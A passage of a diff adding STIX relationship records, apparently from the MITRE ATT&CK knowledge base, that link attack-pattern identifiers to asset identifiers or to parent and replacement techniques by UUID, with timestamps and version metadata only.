"2023-09-28T20:16:55.038Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fadf76e8-63b2-4d69-ba36-e85af1354a67", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fae76637-73a8-4543-b899-91a481cd8d90", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e0232cb0-ded5-4c2e-9dc7-2893142a5c11", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--faebff10-e4a5-4651-9d20-6f6764653c22", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d4dc46e3-5ba5-45b9-8204-010867cacfcb", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--faf05d31-b045-4a02-8800-e43f14cf002c", + "created": "2024-06-21T14:12:20.257Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.257Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fb264d1a-8177-4c42-8e8f-abe2016b39b9", + "created": "2024-06-26T19:29:38.364Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T19:29:38.364Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f005e783-57d4-4837-88ad-dbe7faee1c51", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fb31d542-7699-4942-a8f2-12b0bd21db20", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fb4cc3ac-3f3b-48bb-ba32-5d86c7bcb967", + "created": "2024-06-21T14:12:20.273Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.273Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a3e1e6c5-9c74-4fc0-a16c-a9d228c17829", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fb4f3b46-9e6a-477b-b739-4388d4742bcd", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--561ae9aa-c28a-4144-9eec-e7027a14c8c3", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fb561d57-f1e4-4d4c-be67-198a530b3643", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fb64523c-3acd-49ea-834f-bb99202160cc", + "created": "2024-06-21T14:12:20.261Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.261Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9e7452df-5144-4b6e-b04a-b66dd4016747", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fb7019c5-1ec2-45a3-8122-fe68d4b41682", + "created": "2024-06-21T14:12:20.271Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.271Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6faf650d-bf31-4eb4-802d-1000cf38efaf", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fb7415cd-a6a0-4915-afe0-86fcaa6deb8a", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--01327cde-66c4-4123-bf34-5f258d59457b", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fb82f6d3-0e6b-4fa5-a54a-f7deb28f8324", + "created": "2020-02-12T16:47:16.693Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--66f73398-8394-4711-85e5-34c8540b22a5", + "target_ref": "attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fb8643d1-a377-4ad7-95fe-e12a0eb05b1d", + "created": "2024-06-21T14:12:20.262Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.262Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fbb14545-3333-4619-86bd-d9e1c962a759", + "created": "2024-06-21T14:12:20.257Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.257Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--42fe883a-21ea-4cfb-b94a-78b6476dcc83", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fbbb8233-568b-4437-ac8e-ba1ba974d426", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fbf0263d-5f95-4fbd-982f-cdca9beb5fab", + "created": "2024-06-21T14:12:20.277Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.277Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fbfa9e5f-bf20-40da-a957-c1066f4f6032", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f6dacc85-b37d-458e-b58d-74fc4bbf5755", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fc123d2e-3cd6-4d14-929c-8eb9c9a7cdd2", + "created": "2020-10-01T01:18:35.632Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--274770e0-2612-4ccf-a678-ef8e7bad365d", + "target_ref": "attack-pattern--81033c3b-16a4-46e4-8fed-9b030dd03c4a", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fc163c39-5d4c-463d-92d3-abedb59b5aca", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--561ae9aa-c28a-4144-9eec-e7027a14c8c3", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fc189fa0-1235-46ac-a802-f226dc0ec4e1", + "created": "2023-09-29T17:38:28.664Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:38:28.664Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d67adac8-e3b9-44f9-9e6d-6c2a7d69dbe4", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fc26d209-c7fb-4d59-82da-0be7c72c651d", + "created": "2020-01-14T01:27:31.402Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--806a49c4-970d-43f9-9acc-ac0ee11e6662", + "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fc484248-b190-4219-af65-41043ecfdb33", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--43c9bc06-715b-42db-972f-52d25c09a20c", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fc787de3-8a82-43f6-b649-f01a7006be54", + "created": "2020-06-24T22:30:55.923Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335", + "target_ref": "attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fc8ba7e4-5e1b-4b17-8d80-2ae6e7bb37d2", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fc932929-5324-4bcd-afac-a6c812d14438", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1d24cdee-9ea2-4189-b08e-af110bf2435d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fca5a1c7-8548-4621-97b5-023572344ae4", + "created": "2020-10-19T19:49:24.478Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--d245808a-7086-4310-984a-a84aaaa43f8f", + "target_ref": "attack-pattern--ae7f3575-0a5e-427e-991b-fe03ad44c754", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fcb573cd-8e00-4fc4-bbd3-3cf9746b1fa7", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--92a78814-b191-47ca-909c-1ccfe3777414", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fcba6a58-72b0-4d54-a887-740624e22f6f", + "created": "2024-03-26T15:42:36.840Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-03-26T15:42:36.840Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--77d9c726-b53e-481d-8bcc-1068aebfbb9d", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fcc47ea4-e7bf-4d33-8601-f2fe47d2021e", + "created": "2021-06-25T12:27:20.373Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--28170e17-8384-415c-8486-2e6b294cb803", + "target_ref": "attack-pattern--3d333250-30e4-4a82-9edc-756c68afc529", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fcd6fb59-f613-4248-9fd2-e1012fb07d60", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fcdcb31d-2e52-43f4-a883-c60325a13075", + "created": "2020-03-02T14:24:27.173Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--0bf78622-e8d2-41da-a857-731472d61a92", + "target_ref": "attack-pattern--1cfcb312-b8d7-47a4-b560-4b16cc677292", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fce6611e-54c4-4904-9c3c-562c74201067", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2aed01ad-3df3-4410-a8cb-11ea4ded587c", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fcf64c2c-2a09-4afe-a670-9412d4cc6d52", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1988cc35-ced8-4dad-b2d1-7628488fa967", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fcfa67b5-03dc-4d92-bc34-0f483d48bc6a", + "created": "2020-01-31T12:39:19.056Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--a750a9f6-0bde-4bb3-9aae-1e2786e9780c", + "target_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fd0f8739-6b4a-4b08-aa25-55fda2c0a21d", + "created": "2024-06-21T14:12:20.257Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.257Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fd25bfb9-8a77-4213-ad36-e751c50f50e8", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ea071aa0-8f17-416f-ab0d-2bab7e79003d", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--fd309395-8fcc-402c-9227-90ac897fd602", + "created": "2024-03-26T15:41:39.905Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-03-26T15:41:39.905Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--77d9c726-b53e-481d-8bcc-1068aebfbb9d", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + 